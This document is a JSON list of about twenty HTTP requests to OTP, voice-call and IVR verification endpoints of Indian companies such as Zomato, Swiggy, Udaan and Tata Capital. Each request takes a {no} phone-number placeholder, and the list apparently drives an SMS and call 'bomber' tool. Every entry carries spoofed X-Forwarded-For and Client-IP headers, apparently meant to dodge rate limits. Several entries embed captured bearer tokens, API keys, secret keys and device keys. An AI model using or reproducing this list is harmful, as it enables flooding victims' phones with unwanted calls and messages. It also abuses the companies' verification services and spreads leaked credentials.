[
    {
        "name": "Astroyogi - GenerateOtpV3",
        "url": "https://chapp.astroyogi.com/api/UserAccountV3/GenerateOtpV3",
        "method": "POST",
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded",
            "authorization": "Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJVc2VyVHlwZSI6IlR0YUFwcFVzZXIiLCJFbnRpdHlJZCI6IjI3NDk4NDY1IiwiU291cmNlVXNlclR5cGUiOiJUdGFBcHBVc2VyIiwiU291cmNlRW50aXR5SWQiOiIyNzQ5ODQ2NSIsIm5iZiI6MTc3Njk1NzY3NCwiZXhwIjoxNzg0NzMzODU1fQ.",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": "MobileNumber={no}&PhonCode=91&CountryCode=IN&Plateform=Android&IsResend=false&PhoneDeviceId=baf9c2340552f28e"
    },
    {
        "name": "Astroyogi - Call OTP",
        "url": "https://comm.astroyogi.com/api/OtpComm/SendOtp",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json; charset=UTF-8",
            "authorization": "Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJVc2VyVHlwZSI6IlR0YUFwcFVzZXIiLCJFbnRpdHlJZCI6IjI3NDk4NDY1IiwiU291cmNlVXNlclR5cGUiOiJUdGFBcHBVc2VyIiwiU291cmNlRW50aXR5SWQiOiIyNzQ5ODQ2NSIsIm5iZiI6MTc3Njk1NzY3NCwiZXhwIjoxNzg0NzMzODU1fQ.",
            "versioncode": "577",
            "devicetype": "Android",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": {
            "countryCode": "IN",
            "mobileNumber": "{no}",
            "phoneCode": "91",
            "phoneDeviceId": "baf9c2340552f28e",
            "platform": "Android",
            "requestType": "call"
        }
    },
    {
        "name": "Astroyogi - Web Voice",
        "url": "https://comm.astroyogi.com/api/OtpComm/SendOtp",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "authorization": "Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJVc2VyVHlwZSI6IldlYlVzZXIiLCJFbnRpdHlJZCI6IjAiLCJTb3VyY2VVc2VyVHlwZSI6IiIsIlNvdXJjZUVudGl0eUlkIjoiIiwibmJmIjoxNzc2OTUyMTE3LCJleHAiOjE3ODQ3MjgxMTd9.",
            "origin": "https://www.astroyogi.com",
            "x-requested-with": "mark.via.gp",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": {
            "phoneCode": "91",
            "countryCode": "IN",
            "mobileNumber": "{no}",
            "platform": "Web",
            "IpAddress": "106.207.213.98",
            "requestType": "call",
            "countryCodeByHeader": "IN"
        }
    },
    {
        "name": "Zomato - SMS Verification",
        "url": "https://accounts.zomato.com/login/phone",
        "method": "POST",
        "headers": {
            "x-request-id": "5b951ef5-fa72-4309-8059-be7bf073f3da",
            "Content-Type": "application/x-www-form-urlencoded",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": "number={no}&country_id=1&lc=26fd3c9af2914791b566f84867425876&type=initiate&verification_type=sms&package_name=com.application.zomato&message_uuid="
    },
    {
        "name": "Zomato - Call Verification",
        "url": "https://accounts.zomato.com/login/phone",
        "method": "POST",
        "headers": {
            "x-request-id": "db6007db-59a0-4782-a257-6ca0ec03d9e0",
            "Content-Type": "application/x-www-form-urlencoded",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": "number={no}&country_id=1&lc=26fd3c9af2914791b566f84867425876&type=initiate&verification_type=call&package_name=&message_uuid=sms-service-v2-bd91d1cd-389c-46ad-88cc-dc6f1d847d1c"
    },
    {
        "name": "Udaan - WhatsApp OTP",
        "url": "https://auth.udaan.com/api/otp/send?client_id=udaan-v2&whatsappConsent=true",
        "method": "POST",
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
            "traceparent": "00-44bc4d300f0fb27d2e9b4c637ad0807b-172dd0a728064eda-00",
            "x-app-id": "udaan-auth",
            "origin": "https://auth.udaan.com",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": "mobile={no}"
    },
    {
        "name": "Udaan - Call OTP",
        "url": "https://auth.udaan.com/api/otp/send?client_id=udaan-v2&getOTPCall=true&whatsappConsent=false",
        "method": "POST",
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
            "traceparent": "00-83ce99a6dae2dc6175e863baa2bee4ec-2f2994fda89d06d6-00",
            "x-app-id": "udaan-auth",
            "origin": "https://auth.udaan.com",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": "mobile={no}"
    },
    {
        "name": "Clovia - OTP on Call",
        "url": "https://www.clovia.com/api/v4/users/send-otp-on-call/",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "secretkey": "_fxv&8)36e@kb8na3nj@azl@hzdkfmpaf)lf0+!kt4tu!=feea",
            "apikey": "u(ihlye!wv)d6zpiyp@qxyqwlt)86#o%v^t%@ki-i@bm+18x7g",
            "origin": "https://www.clovia.com",
            "x-requested-with": "mark.via.gp",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": {
            "phone": "{no}",
            "is_signup": "false",
            "email": "",
            "otp": ""
        }
    },
    {
        "name": "Swiggy - Call Verification",
        "url": "https://profile.swiggy.com/api/v3/app/request_call_verification",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "user-agent": "okhttp/3.9.1",
            "accept": "*/*",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": {
            "mobile": "{no}"
        }
    },
    {
        "name": "IndiaLends - Resend OTP",
        "url": "https://indialends.com/pl/SP_MVResend",
        "method": "POST",
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "x-requested-with": "XMLHttpRequest",
            "user-agent": "Mozilla/5.0 (Linux; Android 13)",
            "origin": "https://indialends.com",
            "referer": "https://indialends.com/personal-loan",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": "MobileNumber={no}&Mode=2"
    },
    {
        "name": "PenPencil - Resend OTP",
        "url": "https://api.penpencil.co/v1/users/resend-otp?smsType=2",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "user-agent": "okhttp/3.9.1",
            "accept": "*/*",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": {
            "organizationId": "5eb393ee95fab7468a79d189",
            "mobile": "{no}"
        }
    },
    {
        "name": "Tata Capital - Voice OTP",
        "url": "https://mobapp.tatacapital.com/DLPDelegator/authentication/mobile/v0.1/sendOtpOnVoice",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "user-agent": "okhttp/3.9.1",
            "accept": "*/*",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": {
            "phone": "{no}",
            "applSource": "",
            "isOtpViaCallAtLogin": "true"
        }
    },
    {
        "name": "Pride of Cows - Voice OTP",
        "url": "https://prideofcows.com/prideofcows/api/customer/voiceotp",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "X-CSRF-Token": "iZ0Sk-jaQuHHIP1lFfuV47-LtTgSErAPTnuCuoebNVP6yUf0xagsrY5FiSFhncSh3b7SXUJ25F19GNPA4_dPAw==",
            "X-Requested-With": "XMLHttpRequest",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": {
            "MobileNo": "{no}"
        }
    },
    {
        "name": "Milkbasket - GraphQL OTP",
        "url": "https://consumerbff.milkbasket.com/graphql",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "accept": "*/*",
            "user-agent": "Mozilla/5.0 (Linux; Android 13) AppleWebKit/537.36",
            "origin": "https://milkbasket.web.app",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": {
            "operationName": "registerNumber",
            "variables": {
                "phone": "{no}",
                "retry": true,
                "retryType": "voice",
                "appHash": "",
                "udid": "7X6mgrT7lIYb3OkF"
            },
            "query": "mutation registerNumber($phone: String!, $retry: Boolean!, $retryType: String!, $appHash: String!, $udid: String!) {\n  registerPhoneNumber(\n    phone: $phone\n    retry: $retry\n    retryType: $retryType\n    appHash: $appHash\n    udid: $udid\n  ) {\n    status\n    error\n    errorMsg\n    otpBlockTime\n    __typename\n  }\n}"
        }
    },
    {
        "name": "Happi Mobiles - Login",
        "url": "https://dev-services.happimobiles.com/api/user-login/homepage",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "x-sign": "039babb5984ef534593dbf045e54a798522d3fd35a91b1652aaa12b12bc6d51d",
            "user-agent": "Mozilla/5.0 (Linux; Android 13)",
            "origin": "https://www.happimobiles.com",
            "X-Requested-With": "mark.via.gp",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": {
            "phone": "{no}"
        }
    },
    {
        "name": "SmartCoin - Mobile OTP",
        "url": "https://webapp.smartcoin.co.in/webflow/pre_auth/otp/request",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "user_platform": "WEBFLOW",
            "platform_code": "olyv",
            "user-agent": "Mozilla/5.0 (Linux; Android 13)",
            "origin": "https://app.olyv.co.in",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": {
            "mobile": "{no}"
        }
    },
    {
        "name": "SmartCoin - IVR OTP",
        "url": "https://webapp.smartcoin.co.in/webflow/pre_auth/otp/request",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "user_platform": "WEBFLOW",
            "platform_code": "olyv",
            "user-agent": "Mozilla/5.0 (Linux; Android 10)",
            "origin": "https://app.olyv.co.in",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": {
            "phone_number": "{no}",
            "app_version": "100101",
            "channel": "IVR",
            "request_type": "REGISTRATION",
            "onboarding_consent": true
        }
    },
    {
        "name": "HeyoPhone - Voice OTP",
        "url": "https://api.heyophone.com/heyo/v1/otp/send",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "user-agent": "okhttp/4.12.0",
            "x-requested-with": "XMLHttpRequest",
            "x-device-id": "f461d071a6b39dff",
            "x-device-type": "android",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": {
            "country_code": "+91",
            "number": "{no}",
            "via": "call"
        }
    },
    {
        "name": "Chaayos - IVR Call",
        "url": "https://dine.chaayos.com/app-crm/v2/crm/v/r2-ivr/1000",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "user-agent": "okhttp/4.9.2",
            "devicekey": "5W8+WOK3eMB2WLM3rSSAbBzxj8PADndg/WGBt6ywzny4nUkyTUXbRG2aBXJQYZ23",
            "cid": "1000",
            "bid": "1",
            "device-type": "android",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": {
            "mobileNumber": "{no}"
        }
    },
    {
        "name": "Eyecon - Get Transport",
        "url": "https://api.eyecon-app.com/app/cli_auth/gettransport?cv=vc_577_vn_4.2025.06.20.0759_a&cv=vc_577_vn_4.2025.06.20.0759_a&cli=91{no}&reg_id=cwdE6LsLSnaoOstJm1xWgP%3AAPA91bEz90PQigxUV-vatcQYQ_UALas2SG6LHtwVucLpilrqsYHKheOaQwX8uSKBGaTfCkUq7fervrJg9DzteNquJMN3XFTBZttIriir28DTcREwTZjM1tA&is_already_social_auth=false&installer_name=manually%2Bor%2Bunknown%2Bsource&n_sims=2&time=1751047561997&is_sms_sending_available=true&is_whatsapp_installed=true&device_id=aae59b5d522de85n&adv_id=9f61d53d-5944-47ef-88d3-5f1c2b4128b9&time_zone=Asia%2FKolkata&device_manu=Xiaomi&device_model=POCO%2BM2%2BPro",
        "method": "GET",
        "headers": {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
            "accept": "*/*",
            "content-type": "application/x-www-form-urlencoded; charset=utf-8",
            "Host": "api.eyecon-app.com",
            "Connection": "Keep-Alive",
            "X-Forwarded-For": "192.168.1.1",
            "Client-IP": "192.168.1.1"
        },
        "body": null
    }
]